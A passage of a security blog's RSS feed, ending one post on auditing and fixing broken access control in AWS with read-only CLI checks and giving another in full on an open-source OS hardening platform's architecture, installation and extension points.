JOB_ID=&quot;&lt;returned-job-id&gt;&quot;
aws accessanalyzer get-generated-policy --job-id &quot;${JOB_ID}&quot;
</code></pre>
<p>For a systematic audit approach, the <a href="/aws-least-privilege-audit/">AWS least privilege audit</a> process in IAM EP09 covers how to move from wildcard policies to scoped permissions methodically across a multi-account environment.</p>
<h3 id="fix-4-iam-access-analyzer-with-automated-archiving">Fix 4: IAM Access Analyzer with Automated Archiving</h3>
<pre><code class="" data-line=""># Create an archive rule for known-good cross-account access
# (prevents alert fatigue from legitimate cross-account patterns)
aws accessanalyzer create-archive-rule \
  --analyzer-name &quot;account-access-analyzer&quot; \
  --rule-name &quot;archive-legitimate-cross-account&quot; \
  --filter &#039;{
    &quot;principal.AWS&quot;: {
      &quot;contains&quot;: [&quot;arn:aws:iam::111122223333:role/legitimate-cross-account-role&quot;]
    }
  }&#039;
</code></pre>
<hr />
<h2 id="run-this-in-your-own-environment-a01-audit">Run This in Your Own Environment: A01 Audit</h2>
<p>Run this in any AWS account you own or have read-only access to audit:</p>
<pre><code class="" data-line="">#!/bin/bash
# Purple Team EP04 — Broken Access Control (A01) Audit
# Safe to run with read-only IAM permissions

ACCOUNT=$(aws sts get-caller-identity --query Account --output text)
echo &quot;Auditing account: ${ACCOUNT}&quot;
echo &quot;===============================&quot;

echo &quot;&quot;
echo &quot;[A01-1] S3 Account-Level Public Access Block&quot;
aws s3control get-public-access-block --account-id &quot;${ACCOUNT}&quot; 2&gt;/dev/null || \
  echo &quot;  FINDING: Account-level public access block not configured&quot;

echo &quot;&quot;
echo &quot;[A01-2] S3 Buckets with Public Access&quot;
aws s3api list-buckets --query &#039;Buckets[].Name&#039; --output text | tr &#039;\t&#039; &#039;\n&#039; | \
  while read bucket; do
    status=$(aws s3api get-bucket-policy-status --bucket &quot;$bucket&quot; 2&gt;/dev/null | \
      jq -r &#039;.PolicyStatus.IsPublic // &quot;false&quot;&#039;)
    if [ &quot;$status&quot; = &quot;true&quot; ]; then
      echo &quot;  FINDING: Public bucket: $bucket&quot;
    fi
  done

echo &quot;&quot;
echo &quot;[A01-3] IAM Roles with Wildcard Trust Policies&quot;
aws iam list-roles --query &#039;Roles[].RoleName&#039; --output text | tr &#039;\t&#039; &#039;\n&#039; | head -50 | \
  while read role; do
    trust=$(aws iam get-role --role-name &quot;$role&quot; \
      --query &#039;Role.AssumeRolePolicyDocument.Statement&#039; 2&gt;/dev/null)
    if echo &quot;$trust&quot; | jq -e &#039;.[] | select(.Principal == &quot;*&quot;)&#039; &gt; /dev/null 2&gt;&amp;1; then
      echo &quot;  FINDING: Wildcard trust principal in role: $role&quot;
    fi
  done

echo &quot;&quot;
echo &quot;[A01-4] IAM Access Analyzer — Active External Access Findings&quot;
ANALYZER=$(aws accessanalyzer list-analyzers --query &#039;analyzers[0].arn&#039; --output text 2&gt;/dev/null)
if [ -z &quot;$ANALYZER&quot; ]; then
  echo &quot;  FINDING: IAM Access Analyzer not enabled&quot;
else
  aws accessanalyzer list-findings \
    --analyzer-arn &quot;${ANALYZER}&quot; \
    --filter &#039;{&quot;status&quot;: {&quot;eq&quot;: [&quot;ACTIVE&quot;]}}&#039; \
    --query &#039;findings[].{Resource:resource,Type:resourceType}&#039; \
    --output table
fi
</code></pre>
<hr />
<h2 id="common-mistakes-when-fixing-broken-access-control-in-aws"><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/26a0.png" alt="⚠" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Common Mistakes When Fixing Broken Access Control in AWS</h2>
<p><strong>Fixing the symptom at the bucket level without the account-level block.</strong> If you set <code class="" data-line="">RestrictPublicBuckets=true</code> on individual buckets but leave the account-level block unset, the next bucket created by another engineer starts with public access possible again. The account-level block is the structural control; the bucket-level setting is defense-in-depth.</p>
<p><strong>Not enabling CloudTrail S3 data events.</strong> CloudTrail management events capture bucket creation and policy changes. They do not capture <code class="" data-line="">GetObject</code> and <code class="" data-line="">PutObject</code> by default — that requires enabling S3 data events, which adds cost. Without data events, you cannot see who accessed what in a public bucket. If you can&#8217;t afford data events on all buckets, enable them on buckets containing sensitive data.</p>
<p><strong>Treating IAM Access Analyzer findings as one-time.</strong> Access Analyzer runs continuously. A new resource policy that grants external access generates a new finding. If you archive findings without fixing the underlying policy, you lose visibility. Archive only findings that represent intentional, documented cross-account access.</p>
<p><strong>Confusing &#8220;no GuardDuty findings&#8221; with &#8220;no problem.&#8221;</strong> GuardDuty&#8217;s <code class="" data-line="">Policy:S3/BucketAnonymousAccessGranted</code> only fires when access is newly granted during GuardDuty&#8217;s monitoring window. A bucket that was made public before GuardDuty was enabled will not generate a finding — GuardDuty does not retroactively scan all bucket policies. Use AWS Config for retroactive compliance checks; use GuardDuty for real-time detection of new violations.</p>
<p>For the full IAM attack chain that broken access control enables — including <a href="/aws-iam-privilege-escalation-passrole/">IAM privilege escalation paths via iam:PassRole</a> — see IAM series EP08. The privilege escalation analysis belongs alongside the access control audit.</p>
<hr />
<h2 id="quick-reference">Quick Reference</h2>
<table>
<thead>
<tr>
<th>Control</th>
<th>What It Does</th>
<th>AWS Service</th>
</tr>
</thead>
<tbody>
<tr>
<td>Account-level S3 public access block</td>
<td>Prevents any bucket from becoming public</td>
<td>S3 Control</td>
</tr>
<tr>
<td>SCP: deny public access block disable</td>
<td>Prevents disabling the account-level block</td>
<td>Organizations</td>
</tr>
<tr>
<td>AWS Config: <code class="" data-line="">S3_BUCKET_PUBLIC_READ_PROHIBITED</code></td>
<td>Flags buckets that are or become public</td>
<td>AWS Config</td>
</tr>
<tr>
<td>GuardDuty: <code class="" data-line="">Policy:S3/BucketAnonymousAccessGranted</code></td>
<td>Detects new public access grants</td>
<td>GuardDuty</td>
</tr>
<tr>
<td>IAM Access Analyzer</td>
<td>Finds all resources with external access grants</td>
<td>Access Analyzer</td>
</tr>
<tr>
<td>CloudTrail S3 data events</td>
<td>Captures GetObject/PutObject for audit</td>
<td>CloudTrail</td>
</tr>
<tr>
<td>IAM policy generation</td>
<td>Generates least-privilege policy from actual usage</td>
<td>Access Analyzer</td>
</tr>
</tbody>
</table>
<hr />
<h2 id="key-takeaways">Key Takeaways</h2>
<ul>
<li><strong>Broken access control in AWS</strong> (OWASP A01) is the most common cloud security failure — IAM wildcards, public S3, and broad trust policies are the three primary manifestations</li>
<li>A public S3 bucket with 47 million records was active for six months without a single alert — because the detection controls (AWS Config rules, GuardDuty) weren&#8217;t enabled to look for it</li>
<li>The structural fix is the account-level S3 public access block enforced by SCP — detection tools catch violations; the SCP prevents the violation from being possible</li>
<li>IAM Access Analyzer provides continuous visibility into every resource that grants external access — enable it in every account</li>
<li>The red phase can be run with read-only permissions against your own account — the audit script above reveals your current A01 exposure in under five minutes</li>
<li>Fixing A01 without enabling the A09 controls (CloudTrail data events, GuardDuty, AWS Config) leaves you blind to whether the fix is working</li>
<li>Use Access Analyzer&#8217;s policy generation feature to move from wildcard policies to least-privilege without guessing</li>
</ul>
<hr />
<h2 id="whats-next">What&#8217;s Next</h2>
<p>EP05 covers MFA fatigue attacks — how the Uber and Okta breaches worked at the authentication layer, how to simulate push-notification fatigue in a test environment, and the structural fix: phishing-resistant MFA using FIDO2 hardware keys. The identity layer is where most cloud compromises start — understanding how push MFA fails is the prerequisite for knowing why hardware keys are the only structural answer.</p>
<p>Get EP05 in your inbox when it publishes → <a href="#subscribe">subscribe at linuxcent.com</a></p>
<p><a class="a2a_button_mastodon" href="https://www.addtoany.com/add_to/mastodon?linkurl=https%3A%2F%2Flinuxcent.com%2Fbroken-access-control-aws-cloud%2F&amp;linkname=Broken%20Access%20Control%20in%20AWS%3A%20From%20Misconfigured%20S3%20to%20Admin" title="Mastodon" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Flinuxcent.com%2Fbroken-access-control-aws-cloud%2F&amp;linkname=Broken%20Access%20Control%20in%20AWS%3A%20From%20Misconfigured%20S3%20to%20Admin" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_whatsapp" href="https://www.addtoany.com/add_to/whatsapp?linkurl=https%3A%2F%2Flinuxcent.com%2Fbroken-access-control-aws-cloud%2F&amp;linkname=Broken%20Access%20Control%20in%20AWS%3A%20From%20Misconfigured%20S3%20to%20Admin" title="WhatsApp" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Flinuxcent.com%2Fbroken-access-control-aws-cloud%2F&amp;linkname=Broken%20Access%20Control%20in%20AWS%3A%20From%20Misconfigured%20S3%20to%20Admin" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Flinuxcent.com%2Fbroken-access-control-aws-cloud%2F&amp;linkname=Broken%20Access%20Control%20in%20AWS%3A%20From%20Misconfigured%20S3%20to%20Admin" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Flinuxcent.com%2Fbroken-access-control-aws-cloud%2F&amp;linkname=Broken%20Access%20Control%20in%20AWS%3A%20From%20Misconfigured%20S3%20to%20Admin" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_copy_link" href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Flinuxcent.com%2Fbroken-access-control-aws-cloud%2F&amp;linkname=Broken%20Access%20Control%20in%20AWS%3A%20From%20Misconfigured%20S3%20to%20Admin" title="Copy Link" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share#url=https%3A%2F%2Flinuxcent.com%2Fbroken-access-control-aws-cloud%2F&#038;title=Broken%20Access%20Control%20in%20AWS%3A%20From%20Misconfigured%20S3%20to%20Admin" data-a2a-url="https://linuxcent.com/broken-access-control-aws-cloud/" data-a2a-title="Broken Access Control in AWS: From Misconfigured S3 to Admin"></a></p><p>The post <a href="https://linuxcent.com/broken-access-control-aws-cloud/">Broken Access Control in AWS: From Misconfigured S3 to Admin</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://linuxcent.com/broken-access-control-aws-cloud/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1852</post-id>	</item>
		<item>
		<title>Stratum — OS Hardening as a Platform</title>
		<link>https://linuxcent.com/stratum-os-hardening-platform/</link>
					<comments>https://linuxcent.com/stratum-os-hardening-platform/#respond</comments>
		
		<dc:creator><![CDATA[Vamshi Krishna Santhapuri]]></dc:creator>
		<pubDate>Sun, 31 May 2026 02:00:00 +0000</pubDate>
				<category><![CDATA[OS Image Builder]]></category>
		<category><![CDATA[DevSecOps]]></category>
		<category><![CDATA[Infrastructure as Code]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Open Source]]></category>
		<category><![CDATA[OS Hardening]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Stratum]]></category>
		<guid isPermaLink="false">https://linuxcent.com/?p=1834</guid>

					<description><![CDATA[<p><span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 5</span> <span class="rt-label rt-postfix">minutes</span></span>Stratum — open-core (Apache 2.0) OS hardening platform: declare baselines in YAML, build across six clouds, and gate CI/CD deployments on compliance grade.</p>
<p>The post <a href="https://linuxcent.com/stratum-os-hardening-platform/">Stratum — OS Hardening as a Platform</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></description>
										<content:encoded><![CDATA[<span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 5</span> <span class="rt-label rt-postfix">minutes</span></span><style>
pre{position:relative;background:#1e1e1e;color:#d4d4d4;
    padding:16px 16px 16px 20px;border-radius:6px;overflow-x:auto;
    font-family:'JetBrains Mono','Fira Code','Cascadia Code',Consolas,'Courier New',monospace;
    font-size:.88em;line-height:1.6;border-left:4px solid #555}
code{background:#f4f4f4;padding:2px 5px;border-radius:3px;font-size:.9em}
pre code{background:transparent;padding:0;color:inherit}
pre[data-lang="bash"],pre[data-lang="sh"],
pre[data-lang="shell"],pre[data-lang="zsh"]{border-left-color:#4ec9b0}
pre[data-lang="yaml"],pre[data-lang="json"],
pre[data-lang="toml"],pre[data-lang="xml"]{border-left-color:#569cd6}
pre[data-lang="python"],pre[data-lang="go"],pre[data-lang="rust"],
pre[data-lang="java"],pre[data-lang="c"],pre[data-lang="cpp"]{border-left-color:#c586c0}
pre[data-lang="text"],pre[data-lang="output"],
pre[data-lang="console"]{border-left-color:#888}
.lc-copy-btn{position:absolute;top:8px;right:8px;background:#2d2d2d;color:#ccc;
    border:1px solid #444;border-radius:4px;padding:3px 9px;font-size:.75em;
    font-family:system-ui,sans-serif;cursor:pointer;opacity:0;
    transition:opacity .15s,background .15s;line-height:1.6}
pre:hover .lc-copy-btn{opacity:1}
.lc-copy-btn:hover{background:#3a3a3a;color:#fff}
.lc-copy-btn.copied{color:#4ec9b0;border-color:#4ec9b0}
.lc-lang-badge{position:absolute;top:8px;left:20px;font-family:system-ui,sans-serif;
    font-size:.7em;color:#666;text-transform:uppercase;letter-spacing:.04em;
    line-height:1;pointer-events:none;opacity:0;transition:opacity .15s}
pre:hover .lc-lang-badge{opacity:1}
table{border-collapse:collapse;width:100%;margin:16px 0}
th,td{border:1px solid #ddd;padding:10px 14px;text-align:left}
th{background:#f0f0f0;font-weight:600}
tr:nth-child(even){background:#fafafa}
</style>
<p><script>
(function(){
  if(window.__lcCodeEnhanced)return;
  window.__lcCodeEnhanced=true;
  function enhance(){
    document.querySelectorAll('pre').forEach(function(pre){
      var code=pre.querySelector('code');
      var lang='';
      if(code){var m=(code.className||'').match(/language-(\S+)/);if(m)lang=m[1].toLowerCase();}
      if(lang)pre.setAttribute('data-lang',lang);
      if(lang){var badge=document.createElement('span');badge.className='lc-lang-badge';badge.textContent=lang;pre.insertBefore(badge,pre.firstChild);}
      var btn=document.createElement('button');
      btn.className='lc-copy-btn';btn.textContent='Copy';btn.setAttribute('aria-label','Copy code to clipboard');
      pre.appendChild(btn);
      btn.addEventListener('click',function(){
        var text=code?code.innerText:pre.innerText;
        if(navigator.clipboard&&window.isSecureContext){
          navigator.clipboard.writeText(text).then(function(){ok(btn);}).catch(function(){fb(text,btn);});
        }else{fb(text,btn);}
      });
    });
  }
  function ok(btn){btn.textContent='Copied!';btn.classList.add('copied');setTimeout(function(){btn.textContent='Copy';btn.classList.remove('copied');},2000);}
  function fb(text,btn){
    try{var ta=document.createElement('textarea');ta.value=text;ta.style.cssText='position:fixed;left:-9999px;top:-9999px;opacity:0';document.body.appendChild(ta);ta.select();document.execCommand('copy');document.body.removeChild(ta);ok(btn);}
    catch(e){btn.textContent='✗ Failed';setTimeout(function(){btn.textContent='Copy';},2000);}
  }
  if(document.readyState==='loading'){document.addEventListener('DOMContentLoaded',enhance);}else{enhance();}
})();
</script></p>
<p><em>OS Hardening as Code, Episode 6</em><br />
<em><a href="https://linuxcent.com/cloud-ami-security-risks-custom-os-images/">Cloud AMI Security Risks</a> · <a href="/linux-hardening-as-code-yaml-blueprint/">Linux Hardening as Code</a> · <a href="/linux-hardening-multi-cloud/">Multi-Cloud OS Hardening</a> · <a href="/automated-openscap-compliance-cis/">Automated OpenSCAP Compliance</a> · <a href="/cicd-compliance-gate-hardened-images/">CI/CD Compliance Gate</a> · </em><em>Stratum Platform</em>**</p>
<hr />
<h2 id="tldr">TL;DR</h2>
<ul>
<li>Stratum is open-source under Apache 2.0 — the engine, blueprint format, scanner, and Pipeline API are all available on GitHub</li>
<li>The platform follows the same open-core model as Terraform/OpenTofu and Cilium/Isovalent: OSS core, self-hostable, extendable</li>
<li>Three extension points: custom compliance controls, provider plugins (add new cloud providers), pipeline integrations</li>
<li>Architecture: Blueprint YAML → Engine → Provider Layer → Ansible-Lockdown → OpenSCAP → Golden Image → Pipeline API</li>
<li>The series taught the user-facing interface for five episodes; EP06 covers what&#8217;s underneath and how to build on it</li>
<li>Installation is a single <code class="" data-line="">helm install</code> or <code class="" data-line="">docker compose up</code> — the platform runs in your environment</li>
</ul>
<hr />
<h2 id="the-series-arc-inverted">The Series Arc, Inverted</h2>
<p>EP01 showed that default cloud AMIs arrive pre-broken. By the time you reach EP06, that problem has a complete solution:</p>
<pre><code class="" data-line="">EP01 — The problem:
  Default AMI → Production → Security audit finds gaps
  (unknown OS baseline, unverified hardening, no evidence)

EP06 — The solution:
  HardeningBlueprint YAML
           ↓
    stratum build          ← EP02 (blueprint as code)
    --provider aws,gcp     ← EP03 (multi-cloud)
           ↓
    OpenSCAP scan          ← EP04 (compliance grading)
    Grade: A (94/100)
           ↓
    POST /api/pipeline/scan ← EP05 (CI/CD gate)
    Result: pass
           ↓
    Production deployment
    (Grade A, SARIF attached, blueprint version-controlled)
</code></pre>
<p>For five episodes, you&#8217;ve used Stratum as a user. This episode covers what it looks like to run it yourself, extend it, and build on it.</p>
<hr />
<p>I&#8217;ve spent years watching infrastructure teams solve the same OS hardening problem in slightly different ways. Custom scripts that drift. OpenSCAP runs that produce evidence no one reads. Compliance checklists completed by humans who have competing priorities.</p>
<p>The tools exist. <code class="" data-line="">ansible-lockdown</code> applies CIS controls reliably. OpenSCAP verifies them accurately. The CI/CD systems can enforce anything you can express as a pass/fail. The gap isn&#8217;t the tooling — it&#8217;s the integration layer that ties them together into a reproducible, auditable pipeline.</p>
<p>Stratum is that integration layer, open-sourced.</p>
<p>The philosophy is the same as Terraform applied to OS security posture: declare the desired state in a version-controlled file, apply it reproducibly, and verify it automatically. The skip-at-2am problem disappears not because engineers are more careful, but because there&#8217;s no step to skip.</p>
<hr />
<h2 id="the-architecture">The Architecture</h2>
<pre><code class="" data-line="">┌─────────────────────────────────────────────────────────┐
│                 HardeningBlueprint YAML                  │
│         (version-controlled, provider-agnostic)          │
└─────────────────────┬───────────────────────────────────┘
                      │
                      ▼
┌─────────────────────────────────────────────────────────┐
│                   Stratum Engine                         │
│                  (Apache 2.0, OSS)                       │
│  ┌─────────────┐  ┌──────────────┐  ┌────────────────┐  │
│  │  Blueprint  │  │   Provider   │  │    Scheduler   │  │
│  │   Parser    │  │    Layer     │  │  (parallel     │  │
│  │             │  │  AWS  GCP    │  │   multi-cloud  │  │
│  │  Validates  │  │  Azure DO    │  │   builds)      │  │
│  │  schema +   │  │  Linode      │  │                │  │
│  │  overrides  │  │  Proxmox     │  │                │  │
│  └─────────────┘  └──────────────┘  └────────────────┘  │
└─────────────────────┬───────────────────────────────────┘
                      │
           ┌──────────┴──────────┐
           ▼                     ▼
  ┌─────────────────┐   ┌─────────────────┐
  │ Ansible-Lockdown │   │  OpenSCAP       │
  │  Runner          │   │  Scanner        │
  │                  │   │                 │
  │  UBUNTU22-CIS    │   │  A-F grade      │
  │  RHEL8-STIG      │   │  SARIF export   │
  │  Custom roles    │   │  Drift detect   │
  └────────┬─────────┘   └────────┬────────┘
           │                      │
           └──────────┬───────────┘
                      │
                      ▼
         ┌─────────────────────────┐
         │   Golden Image          │
         │   (AMI / GCP / Azure)   │
         │   + compliance metadata │
         └────────────┬────────────┘
                      │
                      ▼
         ┌─────────────────────────┐
         │   Pipeline API          │
         │   (Apache 2.0, OSS)     │
         │                         │
         │  POST /api/pipeline/scan │
         │  ← CI/CD gate           │
         └─────────────────────────┘
</code></pre>
<p>Every component is open-source under Apache 2.0. The engine, provider layer, Ansible runner, OpenSCAP scanner, and Pipeline API are all in the repository. Nothing is locked to a hosted service.</p>
<hr />
<h2 id="installation">Installation</h2>
<p>Stratum runs as a set of containers. Kubernetes or Docker Compose both work.</p>
<p><strong>Kubernetes (Helm):</strong></p>
<pre><code class="" data-line=""># Clone the repository
git clone https://github.com/rrskris/Stratum
cd Stratum

# Install Stratum in your cluster using the bundled Helm chart
helm install stratum ./deploy/helm/stratum \
  --namespace stratum-system \
  --create-namespace \
  --set config.providers.aws.enabled=true \
  --set config.providers.gcp.enabled=true \
  --set config.storageClass=standard

# Verify
kubectl get pods -n stratum-system
# NAME                          READY   STATUS    RESTARTS   AGE
# stratum-engine-0              1/1     Running   0          2m
# stratum-scanner-7d9b4-abc12   1/1     Running   0          2m
# stratum-api-6c8f5-def34       1/1     Running   0          2m
</code></pre>
<p><strong>Docker Compose (single-node):</strong></p>
<pre><code class="" data-line=""># Clone the repository
git clone https://github.com/rrskris/Stratum
cd Stratum

# Configure providers
cp config/providers.example.yaml config/providers.yaml
vim config/providers.yaml  # add AWS/GCP/Azure credentials

# Start
docker compose up -d

# Stratum is available at http://localhost:8080
</code></pre>
<hr />
<h2 id="the-three-extension-points">The Three Extension Points</h2>
<h3 id="1-custom-compliance-controls">1. Custom Compliance Controls</h3>
<p>Add controls that aren&#8217;t in the CIS benchmark — internal policies, org-specific security requirements, or controls from other frameworks:</p>
<pre><code class="" data-line=""># controls/custom-audit-policy.yaml
id: CUSTOM-001
title: Audit logging retention must be 90 days
description: All instances must retain audit logs for 90 days minimum
severity: high
benchmark: custom
check:
  type: command
  command: &quot;grep -E &#039;^max_log_file_action&#039; /etc/audit/auditd.conf&quot;
  expected: &quot;max_log_file_action = keep_logs&quot;
remediation:
  type: ansible
  task: |
    - name: Configure audit log retention
      lineinfile:
        path: /etc/audit/auditd.conf
        regexp: &#039;^max_log_file_action&#039;
        line: &#039;max_log_file_action = keep_logs&#039;
</code></pre>
<p>Deploy the custom control:</p>
<pre><code class="" data-line="">stratum controls deploy --file controls/custom-audit-policy.yaml
</code></pre>
<p>Reference it in any blueprint:</p>
<pre><code class="" data-line="">compliance:
  benchmark: cis-l1
  controls: all
  additional_controls:
    - CUSTOM-001
</code></pre>
<p>Custom controls appear in the grade calculation and SARIF output alongside CIS controls.</p>
<h3 id="2-provider-plugins">2. Provider Plugins</h3>
<p>Add support for a new cloud provider by implementing the provider interface:</p>
<pre><code class="" data-line=""># providers/custom_provider.py
from stratum.providers import BaseProvider

class CustomProvider(BaseProvider):
    name = &quot;my-cloud&quot;

    def provision_build_instance(self, blueprint, config):
        # Launch a build instance on your cloud
        # Return: instance_id, connection_details
        ...

    def create_image(self, instance_id, blueprint, grade):
        # Snapshot the instance into an image
        # Tag with compliance metadata
        # Return: image_id
        ...

    def terminate_instance(self, instance_id):
        # Clean up the build instance
        ...
</code></pre>
<p>Register the plugin:</p>
<pre><code class="" data-line="">stratum providers register --file providers/custom_provider.py --name my-cloud
</code></pre>
<p>The provider is now available as <code class="" data-line="">--provider my-cloud</code> in all <code class="" data-line="">stratum build</code> commands.</p>
<h3 id="3-pipeline-integrations">3. Pipeline Integrations</h3>
<p>Beyond the curl-based API, Stratum provides a webhook system that fires on build completion, scan results, and gate failures:</p>
<pre><code class="" data-line=""># Webhook configuration
notifications:
  - event: pipeline_gate_failure
    webhook: https://hooks.slack.com/...
    template: |
      Image {{ image_id }} failed compliance gate.
      Grade: {{ grade }} (required: {{ min_grade }})
      Top failing controls:
      {% for control in failing_controls[:3] %}
      - {{ control.id }}: {{ control.title }}
      {% endfor %}

  - event: build_complete
    webhook: https://jira.yourdomain.com/api/...
    template: |
      New image built: {{ image_id }}
      Blueprint: {{ blueprint_name }}@{{ blueprint_version }}
      Grade: {{ grade }}
</code></pre>
<hr />
<h2 id="the-open-core-model">The Open-Core Model</h2>
<p>Stratum follows the same model as the tools that have become infrastructure standards:</p>
<table>
<thead>
<tr>
<th>Tool</th>
<th>Open-core model</th>
</tr>
</thead>
<tbody>
<tr>
<td>Terraform / OpenTofu</td>
<td>Core OSS, enterprise features in paid tier</td>
</tr>
<tr>
<td>Cilium / Isovalent</td>
<td>Core OSS, enterprise support/features in paid tier</td>
</tr>
<tr>
<td>Vault / HCP Vault</td>
<td>Core OSS, hosted/enterprise in paid tier</td>
</tr>
<tr>
<td><strong>Stratum</strong></td>
<td>Engine + blueprint + scanner + Pipeline API: Apache 2.0</td>
</tr>
</tbody>
</table>
<p>Everything taught in this series — the blueprint format, the build pipeline, the compliance grading, the CI/CD gate — is in the OSS core. You can self-host it, extend it, contribute to it, and run it in your own infrastructure without any dependency on a hosted service.</p>
<p>The repository is at: <strong>github.com/rrskris/Stratum</strong></p>
<hr />
<h2 id="what-this-series-taught">What This Series Taught</h2>
<p>EP01 — EP06 in one view:</p>
<table>
<thead>
<tr>
<th>Episode</th>
<th>What you learned</th>
<th>What Stratum does</th>
</tr>
</thead>
<tbody>
<tr>
<td>EP01</td>
<td>Default AMIs are insecure by design</td>
<td>Replaces default AMI with a hardened golden image</td>
</tr>
<tr>
<td>EP02</td>
<td>Blueprint as code — the 2am skip disappears</td>
<td>HardeningBlueprint YAML — 5-step wizard or direct YAML</td>
</tr>
<tr>
<td>EP03</td>
<td>One blueprint, six providers, no drift</td>
<td>6 providers: AWS, GCP, Azure, DigitalOcean, Linode, Proxmox</td>
</tr>
<tr>
<td>EP04</td>
<td>Automated OpenSCAP — grade at build time</td>
<td>Compliance Scanner: A-F, SARIF, drift detection</td>
</tr>
<tr>
<td>EP05</td>
<td>CI/CD gate — the unhardened image never deploys</td>
<td>Pipeline API: <code class="" data-line="">POST /api/pipeline/scan</code></td>
</tr>
<tr>
<td>EP06</td>
<td>The platform — OSS, self-hostable, extendable</td>
<td>Apache 2.0, Helm install, three extension points</td>
</tr>
</tbody>
</table>
<hr />
<h2 id="whats-next">What&#8217;s Next</h2>
<p>This series closes the OS hardening gap. The same principle — declare desired state, build reproducibly, verify automatically — applies to every layer of your infrastructure.</p>
<p>If you&#8217;ve been following the <a href="/ebpf-from-kernel-to-cloud/">eBPF: From Kernel to Cloud series</a>, EP10 covers what happens when you combine kernel-level observability with the hardened base that Stratum provides: every connection, every process spawn, every file access — visible from the host kernel, on an OS baseline you can verify.</p>
<p>The next series: <strong>Purple Team Playbook</strong> — real attack paths against cloud and Kubernetes infrastructure, how they&#8217;re detected, and how they&#8217;re closed. Starting May 8.</p>
<p>GitHub: <a href="https://github.com/rrskris/Stratum">github.com/rrskris/Stratum</a></p>
<p>Get the Purple Team series in your inbox → <a href="https://linuxcent.com/subscribe">linuxcent.com/subscribe</a></p>
<p><a class="a2a_button_mastodon" href="https://www.addtoany.com/add_to/mastodon?linkurl=https%3A%2F%2Flinuxcent.com%2Fstratum-os-hardening-platform%2F&amp;linkname=Stratum%20%E2%80%94%20OS%20Hardening%20as%20a%20Platform" title="Mastodon" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Flinuxcent.com%2Fstratum-os-hardening-platform%2F&amp;linkname=Stratum%20%E2%80%94%20OS%20Hardening%20as%20a%20Platform" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_whatsapp" href="https://www.addtoany.com/add_to/whatsapp?linkurl=https%3A%2F%2Flinuxcent.com%2Fstratum-os-hardening-platform%2F&amp;linkname=Stratum%20%E2%80%94%20OS%20Hardening%20as%20a%20Platform" title="WhatsApp" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Flinuxcent.com%2Fstratum-os-hardening-platform%2F&amp;linkname=Stratum%20%E2%80%94%20OS%20Hardening%20as%20a%20Platform" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Flinuxcent.com%2Fstratum-os-hardening-platform%2F&amp;linkname=Stratum%20%E2%80%94%20OS%20Hardening%20as%20a%20Platform" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Flinuxcent.com%2Fstratum-os-hardening-platform%2F&amp;linkname=Stratum%20%E2%80%94%20OS%20Hardening%20as%20a%20Platform" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_copy_link" href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Flinuxcent.com%2Fstratum-os-hardening-platform%2F&amp;linkname=Stratum%20%E2%80%94%20OS%20Hardening%20as%20a%20Platform" title="Copy Link" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share#url=https%3A%2F%2Flinuxcent.com%2Fstratum-os-hardening-platform%2F&#038;title=Stratum%20%E2%80%94%20OS%20Hardening%20as%20a%20Platform" data-a2a-url="https://linuxcent.com/stratum-os-hardening-platform/" data-a2a-title="Stratum — OS Hardening as a Platform"></a></p><p>The post <a href="https://linuxcent.com/stratum-os-hardening-platform/">Stratum — OS Hardening as a Platform</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://linuxcent.com/stratum-os-hardening-platform/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1834</post-id>	</item>
	</channel>
</rss>

<!--
Performance optimized by W3 Total Cache. Learn more: https://www.boldgrid.com/w3-total-cache/?utm_source=w3tc&utm_medium=footer_comment&utm_campaign=free_plugin

Page Caching using Disk: Enhanced 

Served from: linuxcent.com @ 2026-06-30 15:03:16 by W3 Total Cache
-->